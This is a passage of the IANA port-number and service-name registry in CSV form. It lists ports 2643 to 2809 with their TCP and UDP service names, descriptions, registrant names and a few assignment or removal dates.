gte-samp,2643,udp,GTE-SAMP,[Asher_Altman],[Asher_Altman],,,,,, travsoft-ipx-t,2644,tcp,Travsoft IPX Tunnel,[Jack_Wilson],[Jack_Wilson],,,,,, travsoft-ipx-t,2644,udp,Travsoft IPX Tunnel,[Jack_Wilson],[Jack_Wilson],,,,,, novell-ipx-cmd,2645,tcp,Novell IPX CMD,[Juan_Carlos_Luciani],[Juan_Carlos_Luciani],,,,,, novell-ipx-cmd,2645,udp,Novell IPX CMD,[Juan_Carlos_Luciani],[Juan_Carlos_Luciani],,,,,, and-lm,2646,tcp,AND License Manager,[Dick_van_der_Sijs],[Dick_van_der_Sijs],,,,,, and-lm,2646,udp,AND License Manager,[Dick_van_der_Sijs],[Dick_van_der_Sijs],,,,,, syncserver,2647,tcp,SyncServer,[Shawn_Casey],[Shawn_Casey],,,,,, syncserver,2647,udp,SyncServer,[Shawn_Casey],[Shawn_Casey],,,,,, upsnotifyprot,2648,tcp,Upsnotifyprot,[Mario_Leboute],[Mario_Leboute],,,,,, upsnotifyprot,2648,udp,Upsnotifyprot,[Mario_Leboute],[Mario_Leboute],,,,,, vpsipport,2649,tcp,VPSIPPORT,[Joon_Radley],[Joon_Radley],,,,,, vpsipport,2649,udp,VPSIPPORT,[Joon_Radley],[Joon_Radley],,,,,, eristwoguns,2650,tcp,eristwoguns,[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,, eristwoguns,2650,udp,eristwoguns,[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,, ebinsite,2651,tcp,EBInSite,[Lefteris_Kalamaras],[Lefteris_Kalamaras],,,,,, ebinsite,2651,udp,EBInSite,[Lefteris_Kalamaras],[Lefteris_Kalamaras],,,,,, interpathpanel,2652,tcp,InterPathPanel,[Stephen_Misel],[Stephen_Misel],,,,,, interpathpanel,2652,udp,InterPathPanel,[Stephen_Misel],[Stephen_Misel],,,,,, sonus,2653,tcp,Sonus,[Mark_Garti],[Mark_Garti],,,,,, sonus,2653,udp,Sonus,[Mark_Garti],[Mark_Garti],,,,,, corel-vncadmin,2654,tcp,"Corel VNC Admin IANA assigned this well-formed service name as a replacement for ""corel_vncadmin"".",[Oleg_Noskov],[Oleg_Noskov],,,,,, corel_vncadmin,2654,tcp,Corel VNC Admin,[Oleg_Noskov],[Oleg_Noskov],,,,,,"This entry is an alias to ""corel-vncadmin"". This entry is now historic, not usable for use with many common service discovery mechanisms." corel-vncadmin,2654,udp,"Corel VNC Admin IANA assigned this well-formed service name as a replacement for ""corel_vncadmin"".",[Oleg_Noskov],[Oleg_Noskov],,,,,, corel_vncadmin,2654,udp,Corel VNC Admin,[Oleg_Noskov],[Oleg_Noskov],,,,,,"This entry is an alias to ""corel-vncadmin"". This entry is now historic, not usable for use with many common service discovery mechanisms." unglue,2655,tcp,UNIX Nt Glue,[Peter_Santoro],[Peter_Santoro],,,,,, unglue,2655,udp,UNIX Nt Glue,[Peter_Santoro],[Peter_Santoro],,,,,, kana,2656,tcp,Kana,[Colin_Goldstein],[Colin_Goldstein],,,,,, kana,2656,udp,Kana,[Colin_Goldstein],[Colin_Goldstein],,,,,, sns-dispatcher,2657,tcp,SNS Dispatcher,,,,,,,, sns-dispatcher,2657,udp,SNS Dispatcher,,,,,,,, sns-admin,2658,tcp,SNS Admin,,,,,,,, sns-admin,2658,udp,SNS Admin,,,,,,,, sns-query,2659,tcp,SNS Query,[Mary_Holstege],[Mary_Holstege],,,,,, sns-query,2659,udp,SNS Query,[Mary_Holstege],[Mary_Holstege],,,,,, gcmonitor,2660,tcp,GC Monitor,[Gustavo_Rodriguez_Ri],[Gustavo_Rodriguez_Ri],,,,,, gcmonitor,2660,udp,GC Monitor,[Gustavo_Rodriguez_Ri],[Gustavo_Rodriguez_Ri],,,,,, olhost,2661,tcp,OLHOST,[Robert_Ripberger],[Robert_Ripberger],,,,,, olhost,2661,udp,OLHOST,[Robert_Ripberger],[Robert_Ripberger],,,,,, bintec-capi,2662,tcp,BinTec-CAPI,,,,,,,Unauthorized Use Known on port 2662, bintec-capi,2662,udp,BinTec-CAPI,,,,,,,Unauthorized Use Known on port 2662, bintec-tapi,2663,tcp,BinTec-TAPI,,,,,,,, bintec-tapi,2663,udp,BinTec-TAPI,,,,,,,, patrol-mq-gm,2664,tcp,Patrol for MQ GM,,,,,,,, patrol-mq-gm,2664,udp,Patrol for MQ GM,,,,,,,, patrol-mq-nm,2665,tcp,Patrol for MQ NM,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, patrol-mq-nm,2665,udp,Patrol for MQ NM,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, extensis,2666,tcp,extensis,[Milton_Sagen],[Milton_Sagen],,,,,, extensis,2666,udp,extensis,[Milton_Sagen],[Milton_Sagen],,,,,, alarm-clock-s,2667,tcp,Alarm Clock Server,,,,,,,, alarm-clock-s,2667,udp,Alarm Clock Server,,,,,,,, alarm-clock-c,2668,tcp,Alarm Clock Client,,,,,,,, alarm-clock-c,2668,udp,Alarm Clock Client,,,,,,,, toad,2669,tcp,TOAD,[Michael_Marking],[Michael_Marking],,,,,, toad,2669,udp,TOAD,[Michael_Marking],[Michael_Marking],,,,,, tve-announce,2670,tcp,TVE Announce,[Dean_Blackketter],[Dean_Blackketter],,,,,, tve-announce,2670,udp,TVE Announce,[Dean_Blackketter],[Dean_Blackketter],,,,,, newlixreg,2671,tcp,newlixreg,[Jean_Serge_Gagnon_2],[Jean_Serge_Gagnon_2],,,,,, newlixreg,2671,udp,newlixreg,[Jean_Serge_Gagnon_2],[Jean_Serge_Gagnon_2],,,,,, nhserver,2672,tcp,nhserver,[Adrian_Hornby],[Adrian_Hornby],,,,,, nhserver,2672,udp,nhserver,[Adrian_Hornby],[Adrian_Hornby],,,,,, firstcall42,2673,tcp,First Call 42,[Luke_Bowen],[Luke_Bowen],,,,,, firstcall42,2673,udp,First Call 42,[Luke_Bowen],[Luke_Bowen],,,,,, ewnn,2674,tcp,ewnn,[Yasunari_Yamashita],[Yasunari_Yamashita],,,,,, ewnn,2674,udp,ewnn,[Yasunari_Yamashita],[Yasunari_Yamashita],,,,,, ttc-etap,2675,tcp,TTC ETAP,[Daniel_Becker],[Daniel_Becker],,,,,, ttc-etap,2675,udp,TTC ETAP,[Daniel_Becker],[Daniel_Becker],,,,,, simslink,2676,tcp,SIMSLink,[Steve_Ryckman],[Steve_Ryckman],,,,,, simslink,2676,udp,SIMSLink,[Steve_Ryckman],[Steve_Ryckman],,,,,, gadgetgate1way,2677,tcp,Gadget Gate 1 Way,,,,,,,, gadgetgate1way,2677,udp,Gadget Gate 1 Way,,,,,,,, gadgetgate2way,2678,tcp,Gadget Gate 2 Way,[Matt_Rollins],[Matt_Rollins],,,,,, gadgetgate2way,2678,udp,Gadget Gate 2 Way,[Matt_Rollins],[Matt_Rollins],,,,,, syncserverssl,2679,tcp,Sync Server SSL,[Shawn_Casey],[Shawn_Casey],,,,,, syncserverssl,2679,udp,Sync Server SSL,[Shawn_Casey],[Shawn_Casey],,,,,, pxc-sapxom,2680,tcp,pxc-sapxom,[Hideki_Kiriyama],[Hideki_Kiriyama],,,,,, pxc-sapxom,2680,udp,pxc-sapxom,[Hideki_Kiriyama],[Hideki_Kiriyama],,,,,, mpnjsomb,2681,tcp,mpnjsomb,[Takenori_Miyahara],[Takenori_Miyahara],,,,,, mpnjsomb,2681,udp,mpnjsomb,[Takenori_Miyahara],[Takenori_Miyahara],,,,,, ,2682,,Removed,,,,2002-04-30,,,, ncdloadbalance,2683,tcp,NCDLoadBalance,[Tim_Stevenson],[Tim_Stevenson],,,,,, ncdloadbalance,2683,udp,NCDLoadBalance,[Tim_Stevenson],[Tim_Stevenson],,,,,, mpnjsosv,2684,tcp,mpnjsosv,,,,,,,, mpnjsosv,2684,udp,mpnjsosv,,,,,,,, mpnjsocl,2685,tcp,mpnjsocl,,,,,,,, mpnjsocl,2685,udp,mpnjsocl,,,,,,,, mpnjsomg,2686,tcp,mpnjsomg,[Takenori_Miyahara],[Takenori_Miyahara],,,,,, mpnjsomg,2686,udp,mpnjsomg,[Takenori_Miyahara],[Takenori_Miyahara],,,,,, pq-lic-mgmt,2687,tcp,pq-lic-mgmt,[Bob_Sledge],[Bob_Sledge],,,,,, pq-lic-mgmt,2687,udp,pq-lic-mgmt,[Bob_Sledge],[Bob_Sledge],,,,,, md-cg-http,2688,tcp,md-cf-http,[Lyndon_Nerenberg],[Lyndon_Nerenberg],,,,,, md-cg-http,2688,udp,md-cf-http,[Lyndon_Nerenberg],[Lyndon_Nerenberg],,,,,, fastlynx,2689,tcp,FastLynx,[Dave_Sewell],[Dave_Sewell],,,,,, fastlynx,2689,udp,FastLynx,[Dave_Sewell],[Dave_Sewell],,,,,, hp-nnm-data,2690,tcp,HP NNM Embedded Database,[Chris_Das],[Chris_Das],,,,,, hp-nnm-data,2690,udp,HP NNM Embedded Database,[Chris_Das],[Chris_Das],,,,,, itinternet,2691,tcp,ITInternet ISM Server,[Ron_Ehli],[Ron_Ehli],,,,,, itinternet,2691,udp,ITInternet ISM Server,[Ron_Ehli],[Ron_Ehli],,,,,, admins-lms,2692,tcp,Admins LMS,[Dagfinn_Saether],[Dagfinn_Saether],,,,,, admins-lms,2692,udp,Admins LMS,[Dagfinn_Saether],[Dagfinn_Saether],,,,,, ,2693,tcp,Unassigned,,,,,,,,(Removed 2004-2-6) ,2693,udp,Unassigned,,,,,,,,(Removed 2004-2-6) pwrsevent,2694,tcp,pwrsevent,[Yoshinobu_Nakamura],[Yoshinobu_Nakamura],,,,,, pwrsevent,2694,udp,pwrsevent,[Yoshinobu_Nakamura],[Yoshinobu_Nakamura],,,,,, vspread,2695,tcp,VSPREAD,[Sumitake_kobayashi],[Sumitake_kobayashi],,,,,, vspread,2695,udp,VSPREAD,[Sumitake_kobayashi],[Sumitake_kobayashi],,,,,, unifyadmin,2696,tcp,Unify Admin,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, unifyadmin,2696,udp,Unify Admin,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, oce-snmp-trap,2697,tcp,Oce SNMP Trap Port,[Peter_Teeuwen],[Peter_Teeuwen],,,,,, oce-snmp-trap,2697,udp,Oce SNMP Trap Port,[Peter_Teeuwen],[Peter_Teeuwen],,,,,, mck-ivpip,2698,tcp,MCK-IVPIP,[Robert_Vincent],[Robert_Vincent],,,,,, mck-ivpip,2698,udp,MCK-IVPIP,[Robert_Vincent],[Robert_Vincent],,,,,, csoft-plusclnt,2699,tcp,Csoft Plus Client,[Nedelcho_Stanev],[Nedelcho_Stanev],,,,,, csoft-plusclnt,2699,udp,Csoft Plus Client,[Nedelcho_Stanev],[Nedelcho_Stanev],,,,,, tqdata,2700,tcp,tqdata,[Al_Guetzlaff],[Al_Guetzlaff],,,,,, tqdata,2700,udp,tqdata,[Al_Guetzlaff],[Al_Guetzlaff],,,,,, sms-rcinfo,2701,tcp,SMS RCINFO,,,,,,,, sms-rcinfo,2701,udp,SMS RCINFO,,,,,,,, sms-xfer,2702,tcp,SMS XFER,,,,,,,, sms-xfer,2702,udp,SMS XFER,,,,,,,, sms-chat,2703,tcp,SMS CHAT,,,,,,,, sms-chat,2703,udp,SMS CHAT,,,,,,,, sms-remctrl,2704,tcp,SMS REMCTRL,[Tom_Friend],[Tom_Friend],,,,,, sms-remctrl,2704,udp,SMS REMCTRL,[Tom_Friend],[Tom_Friend],,,,,, sds-admin,2705,tcp,SDS Admin,[Don_Traub],[Don_Traub],,,,,, sds-admin,2705,udp,SDS Admin,[Don_Traub],[Don_Traub],,,,,, ncdmirroring,2706,tcp,NCD Mirroring,[Tim_Stevenson],[Tim_Stevenson],,,,,, ncdmirroring,2706,udp,NCD Mirroring,[Tim_Stevenson],[Tim_Stevenson],,,,,, emcsymapiport,2707,tcp,EMCSYMAPIPORT,[Bruce_Ferjulian],[Bruce_Ferjulian],,,,,, emcsymapiport,2707,udp,EMCSYMAPIPORT,[Bruce_Ferjulian],[Bruce_Ferjulian],,,,,, banyan-net,2708,tcp,Banyan-Net,[R_Thirumurthy],[R_Thirumurthy],,,,,, banyan-net,2708,udp,Banyan-Net,[R_Thirumurthy],[R_Thirumurthy],,,,,, supermon,2709,tcp,Supermon,[Ron_Minnich],[Ron_Minnich],,,,,, supermon,2709,udp,Supermon,[Ron_Minnich],[Ron_Minnich],,,,,, sso-service,2710,tcp,SSO Service,,,,,,,, sso-service,2710,udp,SSO Service,,,,,,,, sso-control,2711,tcp,SSO Control,[Axel_Kern],[Axel_Kern],,,,,, sso-control,2711,udp,SSO Control,[Axel_Kern],[Axel_Kern],,,,,, aocp,2712,tcp,Axapta Object Communication Protocol,[Jakob_Steen_Hansen],[Jakob_Steen_Hansen],,,,,, aocp,2712,udp,Axapta Object Communication Protocol,[Jakob_Steen_Hansen],[Jakob_Steen_Hansen],,,,,, raventbs,2713,tcp,Raven Trinity Broker Service,,,,,,,, raventbs,2713,udp,Raven Trinity Broker Service,,,,,,,, raventdm,2714,tcp,Raven Trinity Data Mover,[Daniel_Sorlov],[Daniel_Sorlov],,,,,, raventdm,2714,udp,Raven Trinity Data Mover,[Daniel_Sorlov],[Daniel_Sorlov],,,,,, hpstgmgr2,2715,tcp,HPSTGMGR2,[Kevin_Collins_2],[Kevin_Collins_2],,,,,, hpstgmgr2,2715,udp,HPSTGMGR2,[Kevin_Collins_2],[Kevin_Collins_2],,,,,, inova-ip-disco,2716,tcp,Inova IP Disco,[Chris_Koeritz],[Chris_Koeritz],,,,,, inova-ip-disco,2716,udp,Inova IP Disco,[Chris_Koeritz],[Chris_Koeritz],,,,,, pn-requester,2717,tcp,PN REQUESTER,,,,,,,, pn-requester,2717,udp,PN REQUESTER,,,,,,,, pn-requester2,2718,tcp,PN REQUESTER 2,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, pn-requester2,2718,udp,PN REQUESTER 2,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, scan-change,2719,tcp,Scan & Change,[Alexander_Raji],[Alexander_Raji],,,,,, scan-change,2719,udp,Scan & Change,[Alexander_Raji],[Alexander_Raji],,,,,, wkars,2720,tcp,wkars,[Barry_Shelton],[Barry_Shelton],,,,,, wkars,2720,udp,wkars,[Barry_Shelton],[Barry_Shelton],,,,,, smart-diagnose,2721,tcp,Smart Diagnose,[Geoffry_Meek],[Geoffry_Meek],,,,,, smart-diagnose,2721,udp,Smart Diagnose,[Geoffry_Meek],[Geoffry_Meek],,,,,, proactivesrvr,2722,tcp,Proactive Server,[Dalit_Naor],[Dalit_Naor],,,,,, proactivesrvr,2722,udp,Proactive Server,[Dalit_Naor],[Dalit_Naor],,,,,, watchdog-nt,2723,tcp,WatchDog NT Protocol,[Glen_Sansoucie],[Glen_Sansoucie],,,,,, watchdog-nt,2723,udp,WatchDog NT Protocol,[Glen_Sansoucie],[Glen_Sansoucie],,,,,, qotps,2724,tcp,qotps,[Piotr_Parlewicz],[Piotr_Parlewicz],,,,,, qotps,2724,udp,qotps,[Piotr_Parlewicz],[Piotr_Parlewicz],,,,,, msolap-ptp2,2725,tcp,MSOLAP PTP2,[Cristian_Petculescu],[Cristian_Petculescu],,,,,, msolap-ptp2,2725,udp,MSOLAP PTP2,[Cristian_Petculescu],[Cristian_Petculescu],,,,,, tams,2726,tcp,TAMS,[David_Leinbach],[David_Leinbach],,,,,, tams,2726,udp,TAMS,[David_Leinbach],[David_Leinbach],,,,,, mgcp-callagent,2727,tcp,Media Gateway Control Protocol Call Agent,[Christian_Huitema],[Christian_Huitema],,,,,, mgcp-callagent,2727,udp,Media Gateway Control Protocol Call Agent,[Christian_Huitema],[Christian_Huitema],,,,,, sqdr,2728,tcp,SQDR,[Matthew_Orzen],[Matthew_Orzen],,,,,, sqdr,2728,udp,SQDR,[Matthew_Orzen],[Matthew_Orzen],,,,,, tcim-control,2729,tcp,TCIM Control,[Dean_Skelton],[Dean_Skelton],,,,,, tcim-control,2729,udp,TCIM Control,[Dean_Skelton],[Dean_Skelton],,,,,, nec-raidplus,2730,tcp,NEC RaidPlus,[Yusuke_Asai],[Yusuke_Asai],,,,,, nec-raidplus,2730,udp,NEC RaidPlus,[Yusuke_Asai],[Yusuke_Asai],,,,,, fyre-messanger,2731,tcp,Fyre Messanger,[Robert_Waters],[Robert_Waters],,,,,, fyre-messanger,2731,udp,Fyre Messagner,[Robert_Waters],[Robert_Waters],,,,,, g5m,2732,tcp,G5M,[Graham_Klyne],[Graham_Klyne],,,,,, g5m,2732,udp,G5M,[Graham_Klyne],[Graham_Klyne],,,,,, signet-ctf,2733,tcp,Signet CTF,[Greg_Broiles],[Greg_Broiles],,,,,, signet-ctf,2733,udp,Signet CTF,[Greg_Broiles],[Greg_Broiles],,,,,, ccs-software,2734,tcp,CCS Software,[Bertus_Jacobs],[Bertus_Jacobs],,,,,, ccs-software,2734,udp,CCS Software,[Bertus_Jacobs],[Bertus_Jacobs],,,,,, netiq-mc,2735,tcp,NetIQ Monitor Console,[Scott_Southard],[Scott_Southard],2010-08-25,,,,, netiq-mc,2735,udp,NetIQ Monitor Console,[Scott_Southard],[Scott_Southard],2010-08-25,,,,, radwiz-nms-srv,2736,tcp,RADWIZ NMS SRV,[Israel_Shainert],[Israel_Shainert],,,,,, radwiz-nms-srv,2736,udp,RADWIZ NMS SRV,[Israel_Shainert],[Israel_Shainert],,,,,, srp-feedback,2737,tcp,SRP Feedback,[Werner_Almesberger],[Werner_Almesberger],,,,,, srp-feedback,2737,udp,SRP Feedback,[Werner_Almesberger],[Werner_Almesberger],,,,,, ndl-tcp-ois-gw,2738,tcp,NDL TCP-OSI Gateway,[Martin_Norman],[Martin_Norman],,,,,, ndl-tcp-ois-gw,2738,udp,NDL TCP-OSI Gateway,[Martin_Norman],[Martin_Norman],,,,,, tn-timing,2739,tcp,TN Timing,[Paul_Roberts],[Paul_Roberts],,,,,, tn-timing,2739,udp,TN Timing,[Paul_Roberts],[Paul_Roberts],,,,,, alarm,2740,tcp,Alarm,[Uriy_Makasjuk],[Uriy_Makasjuk],,,,,, alarm,2740,udp,Alarm,[Uriy_Makasjuk],[Uriy_Makasjuk],,,,,, tsb,2741,tcp,TSB,,,,,,,, tsb,2741,udp,TSB,,,,,,,, tsb2,2742,tcp,TSB2,[Ashish_Chatterjee],[Ashish_Chatterjee],,,,,, tsb2,2742,udp,TSB2,[Ashish_Chatterjee],[Ashish_Chatterjee],,,,,, murx,2743,tcp,murx,[Thomas_Kuiper],[Thomas_Kuiper],,,,,, murx,2743,udp,murx,[Thomas_Kuiper],[Thomas_Kuiper],,,,,, honyaku,2744,tcp,honyaku,[Yasunari_Yamashita],[Yasunari_Yamashita],,,,,, honyaku,2744,udp,honyaku,[Yasunari_Yamashita],[Yasunari_Yamashita],,,,,, urbisnet,2745,tcp,URBISNET,[Urbis_Net_Ltd],[Urbis_Net_Ltd],,,,,, urbisnet,2745,udp,URBISNET,[Urbis_Net_Ltd],[Urbis_Net_Ltd],,,,,, cpudpencap,2746,tcp,CPUDPENCAP,[Tamir_Zegman],[Tamir_Zegman],,,,,, cpudpencap,2746,udp,CPUDPENCAP,[Tamir_Zegman],[Tamir_Zegman],,,,,, fjippol-swrly,2747,tcp,,,,,,,,, fjippol-swrly,2747,udp,,,,,,,,, fjippol-polsvr,2748,tcp,,,,,,,,, fjippol-polsvr,2748,udp,,,,,,,,, fjippol-cnsl,2749,tcp,,,,,,,,, fjippol-cnsl,2749,udp,,,,,,,,, fjippol-port1,2750,tcp,,,,,,,,, fjippol-port1,2750,udp,,,,,,,,, fjippol-port2,2751,tcp,,[Shoichi_Tachibana],[Shoichi_Tachibana],,,,,, fjippol-port2,2751,udp,,[Shoichi_Tachibana],[Shoichi_Tachibana],,,,,, rsisysaccess,2752,tcp,RSISYS ACCESS,[Christophe_Besant],[Christophe_Besant],,,,,, rsisysaccess,2752,udp,RSISYS ACCESS,[Christophe_Besant],[Christophe_Besant],,,,,, de-spot,2753,tcp,de-spot,[Sanjay_Parekh],[Sanjay_Parekh],,,,,, de-spot,2753,udp,de-spot,[Sanjay_Parekh],[Sanjay_Parekh],,,,,, apollo-cc,2754,tcp,APOLLO CC,[Brand_Communications],[Brand_Communications],,,,,, apollo-cc,2754,udp,APOLLO CC,[Brand_Communications],[Brand_Communications],,,,,, expresspay,2755,tcp,Express Pay,[Ben_Higgins],[Ben_Higgins],,,,,, expresspay,2755,udp,Express Pay,[Ben_Higgins],[Ben_Higgins],,,,,, simplement-tie,2756,tcp,simplement-tie,[Tzvika_Chumash],[Tzvika_Chumash],,,,,, simplement-tie,2756,udp,simplement-tie,[Tzvika_Chumash],[Tzvika_Chumash],,,,,, cnrp,2757,tcp,CNRP,[Jacob_Ulmert],[Jacob_Ulmert],,,,,, cnrp,2757,udp,CNRP,[Jacob_Ulmert],[Jacob_Ulmert],,,,,, apollo-status,2758,tcp,APOLLO Status,,,,,,,, apollo-status,2758,udp,APOLLO Status,,,,,,,, apollo-gms,2759,tcp,APOLLO GMS,[Simon_Hovell],[Simon_Hovell],,,,,, apollo-gms,2759,udp,APOLLO GMS,[Simon_Hovell],[Simon_Hovell],,,,,, sabams,2760,tcp,Saba MS,[Davoud_Maha],[Davoud_Maha],,,,,, sabams,2760,udp,Saba MS,[Davoud_Maha],[Davoud_Maha],,,,,, dicom-iscl,2761,tcp,DICOM ISCL,,,,,,,, dicom-iscl,2761,udp,DICOM ISCL,,,,,,,, dicom-tls,2762,tcp,DICOM TLS,[Lawrence_Tarbox],[Lawrence_Tarbox],,,,,, dicom-tls,2762,udp,DICOM TLS,[Lawrence_Tarbox],[Lawrence_Tarbox],,,,,, desktop-dna,2763,tcp,Desktop DNA,[Jon_Walker],[Jon_Walker],,,,,, desktop-dna,2763,udp,Desktop DNA,[Jon_Walker],[Jon_Walker],,,,,, data-insurance,2764,tcp,Data Insurance,[Brent_Irwin],[Brent_Irwin],,,,,, data-insurance,2764,udp,Data Insurance,[Brent_Irwin],[Brent_Irwin],,,,,, qip-audup,2765,tcp,qip-audup,[Mike_Morgan],[Mike_Morgan],,,,,, qip-audup,2765,udp,qip-audup,[Mike_Morgan],[Mike_Morgan],,,,,, compaq-scp,2766,tcp,Compaq SCP,[Ferruccio_Barletta],[Ferruccio_Barletta],,,,,, compaq-scp,2766,udp,Compaq SCP,[Ferruccio_Barletta],[Ferruccio_Barletta],,,,,, uadtc,2767,tcp,UADTC,,,,,,,, uadtc,2767,udp,UADTC,,,,,,,, uacs,2768,tcp,UACS,[Vishwas_Lele],[Vishwas_Lele],,,,,, uacs,2768,udp,UACS,[Vishwas_Lele],[Vishwas_Lele],,,,,, exce,2769,tcp,eXcE,[Norm_Freedman],[Norm_Freedman],,,,,, exce,2769,udp,eXcE,[Norm_Freedman],[Norm_Freedman],,,,,, veronica,2770,tcp,Veronica,[Jonas_Oberg],[Jonas_Oberg],,,,,, veronica,2770,udp,Veronica,[Jonas_Oberg],[Jonas_Oberg],,,,,, vergencecm,2771,tcp,Vergence CM,[Mark_Morwood],[Mark_Morwood],,,,,, vergencecm,2771,udp,Vergence CM,[Mark_Morwood],[Mark_Morwood],,,,,, auris,2772,tcp,auris,[Francisco_Saez_Aranc],[Francisco_Saez_Aranc],,,,,, auris,2772,udp,auris,[Francisco_Saez_Aranc],[Francisco_Saez_Aranc],,,,,, rbakcup1,2773,tcp,RBackup Remote Backup,,,,,,,, rbakcup1,2773,udp,RBackup Remote Backup,,,,,,,, rbakcup2,2774,tcp,RBackup Remote Backup,[Rob_Cosgrove],[Rob_Cosgrove],,,,,, rbakcup2,2774,udp,RBackup Remote Backup,[Rob_Cosgrove],[Rob_Cosgrove],,,,,, smpp,2775,tcp,SMPP,[Owen_Sullivan],[Owen_Sullivan],,,,,, smpp,2775,udp,SMPP,[Owen_Sullivan],[Owen_Sullivan],,,,,, ridgeway1,2776,tcp,Ridgeway Systems & Software,,,,,,,, ridgeway1,2776,udp,Ridgeway Systems & Software,,,,,,,, ridgeway2,2777,tcp,Ridgeway Systems & Software,[Steve_Read],[Steve_Read],,,,,, ridgeway2,2777,udp,Ridgeway Systems & Software,[Steve_Read],[Steve_Read],,,,,, gwen-sonya,2778,tcp,Gwen-Sonya,[Mark_Hurst],[Mark_Hurst],,,,,, gwen-sonya,2778,udp,Gwen-Sonya,[Mark_Hurst],[Mark_Hurst],,,,,, lbc-sync,2779,tcp,LBC Sync,,,,,,,, lbc-sync,2779,udp,LBC Sync,,,,,,,, lbc-control,2780,tcp,LBC Control,[Keiji_Michine],[Keiji_Michine],,,,,, lbc-control,2780,udp,LBC Control,[Keiji_Michine],[Keiji_Michine],,,,,, whosells,2781,tcp,whosells,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, whosells,2781,udp,whosells,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, everydayrc,2782,tcp,everydayrc,[Ahti_Heinla],[Ahti_Heinla],,,,,, everydayrc,2782,udp,everydayrc,[Ahti_Heinla],[Ahti_Heinla],,,,,, aises,2783,tcp,AISES,[Daniel_Grazioli],[Daniel_Grazioli],,,,,, aises,2783,udp,AISES,[Daniel_Grazioli],[Daniel_Grazioli],,,,,, www-dev,2784,tcp,world wide web - development,,,,,,,, www-dev,2784,udp,world wide web - development,,,,,,,, aic-np,2785,tcp,aic-np,[Brad_Parker],[Brad_Parker],,,,,, aic-np,2785,udp,aic-np,[Brad_Parker],[Brad_Parker],,,,,, aic-oncrpc,2786,tcp,aic-oncrpc - Destiny MCD database,[Brad_Parker],[Brad_Parker],,,,,, aic-oncrpc,2786,udp,aic-oncrpc - Destiny MCD database,[Brad_Parker],[Brad_Parker],,,,,, piccolo,2787,tcp,piccolo - Cornerstone Software,[Dave_Bellivea],[Dave_Bellivea],,,,,, piccolo,2787,udp,piccolo - Cornerstone Software,[Dave_Bellivea],[Dave_Bellivea],,,,,, fryeserv,2788,tcp,NetWare Loadable Module - Seagate Software,[Joseph_LoPilato],[Joseph_LoPilato],,,,,, fryeserv,2788,udp,NetWare Loadable Module - Seagate Software,[Joseph_LoPilato],[Joseph_LoPilato],,,,,, media-agent,2789,tcp,Media Agent,[Nitzan_Daube],[Nitzan_Daube],,,,,, media-agent,2789,udp,Media Agent,[Nitzan_Daube],[Nitzan_Daube],,,,,, plgproxy,2790,tcp,PLG Proxy,[Charlie_Hava],[Charlie_Hava],,,,,, plgproxy,2790,udp,PLG Proxy,[Charlie_Hava],[Charlie_Hava],,,,,, mtport-regist,2791,tcp,MT Port Registrator,[Maxim_Tseitlin],[Maxim_Tseitlin],,,,,, mtport-regist,2791,udp,MT Port Registrator,[Maxim_Tseitlin],[Maxim_Tseitlin],,,,,, f5-globalsite,2792,tcp,f5-globalsite,[Christian_Saether_2],[Christian_Saether_2],,,,,, f5-globalsite,2792,udp,f5-globalsite,[Christian_Saether_2],[Christian_Saether_2],,,,,, initlsmsad,2793,tcp,initlsmsad,[Kelly_Green],[Kelly_Green],,,,,, initlsmsad,2793,udp,initlsmsad,[Kelly_Green],[Kelly_Green],,,,,, ,2794,,Unassigned,,,,2006-12-04,,,, livestats,2795,tcp,LiveStats,[Chris_Greene],[Chris_Greene],,,,,, livestats,2795,udp,LiveStats,[Chris_Greene],[Chris_Greene],,,,,, ac-tech,2796,tcp,ac-tech,[Chiming_Huang],[Chiming_Huang],,,,,, ac-tech,2796,udp,ac-tech,[Chiming_Huang],[Chiming_Huang],,,,,, esp-encap,2797,tcp,esp-encap,[Jorn_Sierwald],[Jorn_Sierwald],,,,,, esp-encap,2797,udp,esp-encap,[Jorn_Sierwald],[Jorn_Sierwald],,,,,, tmesis-upshot,2798,tcp,TMESIS-UPShot,[Brian_Schenkenberger],[Brian_Schenkenberger],,,,,, tmesis-upshot,2798,udp,TMESIS-UPShot,[Brian_Schenkenberger],[Brian_Schenkenberger],,,,,, icon-discover,2799,tcp,ICON Discover,[Alexander_Falk],[Alexander_Falk],,,,,, icon-discover,2799,udp,ICON Discover,[Alexander_Falk],[Alexander_Falk],,,,,, acc-raid,2800,tcp,ACC RAID,[Scott_St_Clair],[Scott_St_Clair],,,,,, acc-raid,2800,udp,ACC RAID,[Scott_St_Clair],[Scott_St_Clair],,,,,, igcp,2801,tcp,IGCP,[David_Hampson],[David_Hampson],,,,,, igcp,2801,udp,IGCP,[David_Hampson],[David_Hampson],,,,,, veritas-tcp1,2802,tcp,Veritas TCP1,,,,,,,, veritas-udp1,2802,udp,Veritas UDP1,[Russ_Thrasher],[Russ_Thrasher],,,,,, btprjctrl,2803,tcp,btprjctrl,[Huw_Thomas],[Huw_Thomas],,,,,, btprjctrl,2803,udp,btprjctrl,[Huw_Thomas],[Huw_Thomas],,,,,, dvr-esm,2804,tcp,March Networks Digital Video Recorders and Enterprise Service Manager products,[Paul_Streatch],[Paul_Streatch],2004-06,,,,, dvr-esm,2804,udp,March Networks Digital Video Recorders and Enterprise Service Manager products,[Paul_Streatch],[Paul_Streatch],2004-06,,,,, wta-wsp-s,2805,tcp,WTA WSP-S,[Sebastien_Bury],[Sebastien_Bury],,,,,, wta-wsp-s,2805,udp,WTA WSP-S,[Sebastien_Bury],[Sebastien_Bury],,,,,, cspuni,2806,tcp,cspuni,,,,,,,, cspuni,2806,udp,cspuni,,,,,,,, cspmulti,2807,tcp,cspmulti,[Terumasa_Yoneda],[Terumasa_Yoneda],,,,,, cspmulti,2807,udp,cspmulti,[Terumasa_Yoneda],[Terumasa_Yoneda],,,,,, j-lan-p,2808,tcp,J-LAN-P,[Takeshi_Sahara],[Takeshi_Sahara],,,,,, j-lan-p,2808,udp,J-LAN-P,[Takeshi_Sahara],[Takeshi_Sahara],,,,,, corbaloc,2809,tcp,CORBA 